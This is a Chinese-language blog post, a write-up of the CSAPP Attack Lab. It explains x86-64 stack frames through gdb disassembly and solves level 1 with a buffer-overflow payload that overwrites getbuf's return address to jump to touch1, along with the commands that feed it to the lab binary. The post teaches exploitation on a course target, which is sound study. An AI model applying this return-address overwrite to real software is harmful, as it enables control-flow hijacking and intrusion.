<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css" integrity="sha256-DfWjNxDkM94fVBWx1H5BMMp0Zq7luBlV8QRcSES7s+0=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.12.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="CSAPP lab3(Attack Lab)1时间：2022.7.5上午-2022.7.7上午  函数调用栈讲解首先明白栈这个内存结构，它先入后出，同时进行push的时候地址是减小的，也就是说栈顶地址最小，栈底地址最大。在x86-64中采用栈指针寄存器%rsp指向栈顶，如下图所示。">
<meta property="og:type" content="article">
<meta property="og:title" content="CSAPP Lab3(Attack Lab)">
<meta property="og:url" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/index.html">
<meta property="og:site_name" content="洗衣机随想录">
<meta property="og:description" content="CSAPP lab3(Attack Lab)1时间：2022.7.5上午-2022.7.7上午  函数调用栈讲解首先明白栈这个内存结构，它先入后出，同时进行push的时候地址是减小的，也就是说栈顶地址最小，栈底地址最大。在x86-64中采用栈指针寄存器%rsp指向栈顶，如下图所示。">
<meta property="og:locale">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/1.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/2.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/3.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/4.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/5.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/6.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/7.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/8.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/9.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/10.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/11.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/12.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/13.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/14.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/15.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/16.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/17.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/18.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/19.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/20.jpg">
<meta property="og:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/21.jpg">
<meta property="article:published_time" content="2022-07-11T12:50:40.000Z">
<meta property="article:modified_time" content="2022-07-11T15:02:46.987Z">
<meta property="article:author" content="Xinyi">
<meta property="article:tag" content="CSAPP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/1.jpg">


<link rel="canonical" href="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-Hans","comments":true,"permalink":"http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/","path":"2022/07/11/CSAPP-Lab3-Attack-Lab/","title":"CSAPP Lab3(Attack Lab)"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>CSAPP Lab3(Attack Lab) | 洗衣机随想录</title>
  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">洗衣机随想录</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">归去来兮</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#CSAPP-lab3-Attack-Lab"><span class="nav-number">1.</span> <span class="nav-text">CSAPP lab3(Attack Lab)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%87%BD%E6%95%B0%E8%B0%83%E7%94%A8%E6%A0%88%E8%AE%B2%E8%A7%A3"><span class="nav-number">1.1.</span> <span class="nav-text">函数调用栈讲解</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB"><span class="nav-number">1.2.</span> <span class="nav-text">代码注入攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#level-1"><span class="nav-number">1.2.1.</span> <span class="nav-text">level 1</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#level-2"><span class="nav-number">1.2.2.</span> <span class="nav-text">level 2</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#level-3"><span class="nav-number">1.2.3.</span> <span class="nav-text">level 3</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ROP-Return-Oriented-Programming-%E6%94%BB%E5%87%BB"><span class="nav-number">1.3.</span> <span class="nav-text">ROP(Return-Oriented Programming)攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#level-2-1"><span class="nav-number">1.3.1.</span> <span class="nav-text">level 2</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#level-3-1"><span class="nav-number">1.3.2.</span> <span class="nav-text">level 3</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Xinyi</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">5</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/07/11/CSAPP-Lab3-Attack-Lab/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Xinyi">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="洗衣机随想录">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="CSAPP Lab3(Attack Lab) | 洗衣机随想录">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          CSAPP Lab3(Attack Lab)
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2022-07-11 20:50:40 / 修改时间：23:02:46" itemprop="dateCreated datePublished" datetime="2022-07-11T20:50:40+08:00">2022-07-11</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%B3%BB%E7%BB%9F%E7%BB%93%E6%9E%84/" itemprop="url" rel="index"><span itemprop="name">计算机系统结构</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="CSAPP-lab3-Attack-Lab"><a href="#CSAPP-lab3-Attack-Lab" class="headerlink" title="CSAPP lab3(Attack Lab)"></a>CSAPP lab3(Attack Lab)</h2><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">时间：<span class="number">2022.7</span><span class="number">.5</span>上午<span class="number">-2022.7</span><span class="number">.7</span>上午</span><br></pre></td></tr></table></figure>

<h3 id="函数调用栈讲解"><a href="#函数调用栈讲解" class="headerlink" title="函数调用栈讲解"></a>函数调用栈讲解</h3><p>首先明白栈这个内存结构，它先入后出，同时进行push的时候地址是减小的，也就是说栈顶地址最小，栈底地址最大。在x86-64中采用栈指针寄存器%rsp指向栈顶，如下图所示。</p>
<span id="more"></span>

<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/1.jpg"></p>
<p>假设初始rsp为红色，执行pushq src代码，进行<strong>入栈操作</strong>，红色变为蓝色：</p>
<ol>
<li>取出src的操作码</li>
<li>sub $0x8,%rsp</li>
<li>src的操作码写入%rsp的新地址当中</li>
</ol>
<p>假设初始rsp为红色，执行pop<strong>出栈操作</strong>，对应popq Dest，红色变为黄色：</p>
<ol>
<li>从%rsp读取数据</li>
<li>add $0x8,%rsp</li>
<li>取出的值放入Dest中（必须是一个寄存器）</li>
</ol>
<p>以如下程序段为例：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">echo</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="type">char</span> buf[<span class="number">8</span>];</span><br><span class="line">    <span class="built_in">custom_gets</span>(buf);</span><br><span class="line">    <span class="built_in">puts</span>(buf);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span>* argv[])</span></span>&#123;</span><br><span class="line">    <span class="built_in">echo</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//echo对应汇编</span></span><br><span class="line">echo:</span><br><span class="line">    subq    $<span class="number">24</span>, %rsp</span><br><span class="line">    movq    %rsp, %rdi</span><br><span class="line">    call    custom_gets</span><br><span class="line">    movq    %rsp, %rdi</span><br><span class="line">    call    puts</span><br><span class="line">    addq    $<span class="number">24</span>, %rsp</span><br><span class="line">    ret</span><br></pre></td></tr></table></figure>

<p>可以画出如图所示的函数调用栈：</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/2.jpg"></p>
<p>图中所示的调用者为main函数，%rsp为执行操作sub $0x18,%rsp之后的新值。正常情况下执行完echo()前面语句之后，到达addq $24,%rsp语句，到达原来的返回地址（图上标注），然后执行ret操作：从栈顶处取出值，寄存器做对应修改，以接着调用者调用完成函数之后的<strong>下一步</strong>开始执行，对于汇编代码来说，这个返回地址存的是<strong>callq之后下一条语句</strong>的地址，以达到返回调用函数之后正常执行的目的。</p>
<p><strong>正常调用过程用该实验代码来进行讲解</strong></p>
<p>test()调用getbuf()，将二者都反编译如下：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*test函数反编译*/</span></span><br><span class="line">(gdb) disas test</span><br><span class="line">Dump of assembler code <span class="keyword">for</span> function test:</span><br><span class="line">   <span class="number">0x0000000000401968</span> &lt;+<span class="number">0</span>&gt;:		sub    $<span class="number">0x8</span>,%rsp</span><br><span class="line">   <span class="number">0x000000000040196c</span> &lt;+<span class="number">4</span>&gt;:		mov    $<span class="number">0x0</span>,%eax</span><br><span class="line">   <span class="number">0x0000000000401971</span> &lt;+<span class="number">9</span>&gt;:		callq  <span class="number">0x4017a8</span> &lt;getbuf&gt;</span><br><span class="line">   <span class="number">0x0000000000401976</span> &lt;+<span class="number">14</span>&gt;:	mov    %eax,%edx</span><br><span class="line">   <span class="number">0x0000000000401978</span> &lt;+<span class="number">16</span>&gt;:	mov    $<span class="number">0x403188</span>,%esi</span><br><span class="line">   <span class="number">0x000000000040197d</span> &lt;+<span class="number">21</span>&gt;:	mov    $<span class="number">0x1</span>,%edi</span><br><span class="line">   <span class="number">0x0000000000401982</span> &lt;+<span class="number">26</span>&gt;:	mov    $<span class="number">0x0</span>,%eax</span><br><span class="line">   <span class="number">0x0000000000401987</span> &lt;+<span class="number">31</span>&gt;:	callq  <span class="number">0x400df0</span> &lt;__printf_chk@plt&gt;</span><br><span class="line">   <span class="number">0x000000000040198c</span> &lt;+<span class="number">36</span>&gt;:	add    $<span class="number">0x8</span>,%rsp</span><br><span class="line">   <span class="number">0x0000000000401990</span> &lt;+<span class="number">40</span>&gt;:	retq </span><br><span class="line">       </span><br><span class="line"><span class="comment">/*getbuf函数反编译*/</span></span><br><span class="line">(gdb) disas getbuf</span><br><span class="line">Dump of assembler code <span class="keyword">for</span> function getbuf:</span><br><span class="line">   <span class="number">0x00000000004017a8</span> &lt;+<span class="number">0</span>&gt;:		sub    $<span class="number">0x28</span>,%rsp<span class="comment">//分配了40个字节</span></span><br><span class="line">   <span class="number">0x00000000004017ac</span> &lt;+<span class="number">4</span>&gt;:		mov    %rsp,%rdi</span><br><span class="line">   <span class="number">0x00000000004017af</span> &lt;+<span class="number">7</span>&gt;:		callq  <span class="number">0x401a40</span> &lt;Gets&gt;</span><br><span class="line">   <span class="number">0x00000000004017b4</span> &lt;+<span class="number">12</span>&gt;:	mov    $<span class="number">0x1</span>,%eax</span><br><span class="line">   <span class="number">0x00000000004017b9</span> &lt;+<span class="number">17</span>&gt;:	add    $<span class="number">0x28</span>,%rsp<span class="comment">//断点</span></span><br><span class="line">   <span class="number">0x00000000004017bd</span> &lt;+<span class="number">21</span>&gt;:	retq        </span><br></pre></td></tr></table></figure>

<p>在0x00000000004017b9处设置断点，<img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/3.jpg"></p>
<p>反编译：<img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/4.jpg"></p>
<p>看一下寄存器的状态：<img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/5.jpg"></p>
<p>主要关注栈顶指针rsp存0x5561dc78，指向要进行操作的地址的指针rip存0x4017b9，也就是我们设置断点的地方：<img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/6.jpg"></p>
<p>将程序单步调试一下：<img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/7.jpg"></p>
<p>此时栈顶寄存器rsp存0x5561dca0（栈顶地址，对存的这个栈顶地址取值就是要返回的语句地址，即下一条语句地址），要进行的操作地址为rip中的0x4017bd，也就是最后的ret操作.</p>
<p>按照上面的理论，现在$rsp&#x3D;0x5561dca0，那么其中存的就是下一条语句的地址，根据test()的汇编代码，应该是   0x0000000000401976 &lt;+14&gt;:	mov    %eax,%edx</p>
<p>现在检查$rsp：</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/8.jpg"></p>
<p>可以看到正是调用函数之后下一条语句的地址。</p>
<h3 id="代码注入攻击"><a href="#代码注入攻击" class="headerlink" title="代码注入攻击"></a>代码注入攻击</h3><p>需要注意的是这个实验有一个官方文档<a target="_blank" rel="noopener" href="http://csapp.cs.cmu.edu/3e/attacklab.pdf%EF%BC%8C%E5%86%99%E4%BA%86%E5%87%A0%E4%B8%AA%E5%87%BD%E6%95%B0%E7%9A%84c%E8%AF%AD%E8%A8%80%E7%89%88%E6%9C%AC%EF%BC%8C%E4%BE%BF%E4%BA%8E%E7%90%86%E8%A7%A3%E3%80%82">http://csapp.cs.cmu.edu/3e/attacklab.pdf，写了几个函数的c语言版本，便于理解。</a></p>
<h4 id="level-1"><a href="#level-1" class="headerlink" title="level 1"></a>level 1</h4><p><strong>这一段攻击代码是通过getbuf的参数形式注入的</strong></p>
<p><strong>基本思想：</strong>对于getbuf函数来说，实际分配了40个字节，如果我们填充大于39个字节（默认有一个结束）则发生内存溢出，会修改其他位置的值，这个修改如果比较特殊，比如完全修改原返回地址（本来为调用完getbuf后一条语句的值）为一个新函数的开始地址，则可以开始执行新的函数，所以可以通过数组溢出修改原返回地址为touch1的函数地址，完成攻击。</p>
<p>要使得调用函数getbuf之后返回到函数touch1上面</p>
<p>先反编译一下test函数，看一下地址：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">(gdb) disas test</span><br><span class="line">Dump of assembler code <span class="keyword">for</span> function test:</span><br><span class="line">   <span class="number">0x0000000000401968</span> &lt;+<span class="number">0</span>&gt;:		sub    $<span class="number">0x8</span>,%rsp</span><br><span class="line">   <span class="number">0x000000000040196c</span> &lt;+<span class="number">4</span>&gt;:		mov    $<span class="number">0x0</span>,%eax</span><br><span class="line">   <span class="number">0x0000000000401971</span> &lt;+<span class="number">9</span>&gt;:		callq  <span class="number">0x4017a8</span> &lt;getbuf&gt;</span><br><span class="line">   <span class="number">0x0000000000401976</span> &lt;+<span class="number">14</span>&gt;:	mov    %eax,%edx</span><br><span class="line">   <span class="number">0x0000000000401978</span> &lt;+<span class="number">16</span>&gt;:	mov    $<span class="number">0x403188</span>,%esi</span><br><span class="line">   <span class="number">0x000000000040197d</span> &lt;+<span class="number">21</span>&gt;:	mov    $<span class="number">0x1</span>,%edi</span><br><span class="line">   <span class="number">0x0000000000401982</span> &lt;+<span class="number">26</span>&gt;:	mov    $<span class="number">0x0</span>,%eax</span><br><span class="line">   <span class="number">0x0000000000401987</span> &lt;+<span class="number">31</span>&gt;:	callq  <span class="number">0x400df0</span> &lt;__printf_chk@plt&gt;</span><br><span class="line">   <span class="number">0x000000000040198c</span> &lt;+<span class="number">36</span>&gt;:	add    $<span class="number">0x8</span>,%rsp</span><br><span class="line">   <span class="number">0x0000000000401990</span> &lt;+<span class="number">40</span>&gt;:	retq </span><br></pre></td></tr></table></figure>

<p>再反编译一下getbuf函数，看一下实际分配了多少个字节：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">(gdb) disas getbuf</span><br><span class="line">Dump of assembler code <span class="keyword">for</span> function getbuf:</span><br><span class="line">   <span class="number">0x00000000004017a8</span> &lt;+<span class="number">0</span>&gt;:		sub    $<span class="number">0x28</span>,%rsp<span class="comment">//分配了40个字节</span></span><br><span class="line">   <span class="number">0x00000000004017ac</span> &lt;+<span class="number">4</span>&gt;:		mov    %rsp,%rdi</span><br><span class="line">   <span class="number">0x00000000004017af</span> &lt;+<span class="number">7</span>&gt;:		callq  <span class="number">0x401a40</span> &lt;Gets&gt;</span><br><span class="line">   <span class="number">0x00000000004017b4</span> &lt;+<span class="number">12</span>&gt;:	mov    $<span class="number">0x1</span>,%eax</span><br><span class="line">   <span class="number">0x00000000004017b9</span> &lt;+<span class="number">17</span>&gt;:	add    $<span class="number">0x28</span>,%rsp</span><br><span class="line">   <span class="number">0x00000000004017bd</span> &lt;+<span class="number">21</span>&gt;:	retq   </span><br></pre></td></tr></table></figure>

<p>再反编译touch1函数，看一下返回地址：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">(gdb) disas touch1</span><br><span class="line">Dump of assembler code <span class="keyword">for</span> function touch1:</span><br><span class="line">   <span class="number">0x00000000004017c0</span> &lt;+<span class="number">0</span>&gt;:		sub    $<span class="number">0x8</span>,%rsp<span class="comment">//可以卡到返回地址0x00000000004017c0，写入的时候注意是little- endian，低位低地址</span></span><br><span class="line">   <span class="number">0x00000000004017c4</span> &lt;+<span class="number">4</span>&gt;:		movl   $<span class="number">0x1</span>,<span class="number">0x202d0e</span>(%rip)        # <span class="number">0x6044dc</span> &lt;vlevel&gt;</span><br><span class="line">   <span class="number">0x00000000004017ce</span> &lt;+<span class="number">14</span>&gt;:	mov    $<span class="number">0x4030c5</span>,%edi</span><br><span class="line">   <span class="number">0x00000000004017d3</span> &lt;+<span class="number">19</span>&gt;:	callq  <span class="number">0x400cc0</span> &lt;puts@plt&gt;</span><br><span class="line">   <span class="number">0x00000000004017d8</span> &lt;+<span class="number">24</span>&gt;:	mov    $<span class="number">0x1</span>,%edi</span><br><span class="line">   <span class="number">0x00000000004017dd</span> &lt;+<span class="number">29</span>&gt;:	callq  <span class="number">0x401c8d</span> &lt;validate&gt;</span><br><span class="line">   <span class="number">0x00000000004017e2</span> &lt;+<span class="number">34</span>&gt;:	mov    $<span class="number">0x0</span>,%edi</span><br><span class="line">   <span class="number">0x00000000004017e7</span> &lt;+<span class="number">39</span>&gt;:	callq  <span class="number">0x400e40</span> &lt;exit@plt&gt;</span><br></pre></td></tr></table></figure>

<p>所以现在要输入一堆十六进制字符先填充40个字节的getbuf空间，然后再写入touch1的返回地址以修改test函数中预留的返回地址，达到劫持程序流的目的，这里40个字节可以全用0x00填充：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//40个字节空间</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="comment">//修改返回地址</span></span><br><span class="line">c0 <span class="number">17</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>  <span class="comment">//小端写法</span></span><br><span class="line">    </span><br><span class="line"><span class="comment">//答案</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> c0 <span class="number">17</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br></pre></td></tr></table></figure>

<p>创建一个文件p1.txt存字符串方便输入，并用.&#x2F;hex2raw &lt; p1.txt &gt; p1r.txt转化为字节码，再执行.&#x2F;ctarget -qi p1r.txt，得到如下结果：</p>
<p><img src="/2022/07/11/CSAPP-Lab3-Attack-Lab/9.jpg"></p>
<p>需要注意的是有的教程最后使用.&#x2F;ctarget -i p1r.txt报错“FAILED: Initialization error: Running on an illegal host [ubuntu]”，这个问题在文档解决的时候有一句话“ when running executables <code>./ctarget</code> and <code>./rtarget</code>?</p>
<p>  Include the <code>-q</code> flag which prevents program from contacting non-existent grading server in addition to the above   error.”</p>
<p>也就是出问题的时候加上-q，根据-h时显示的帮助，-qi即可完成最终效果如上。</p>
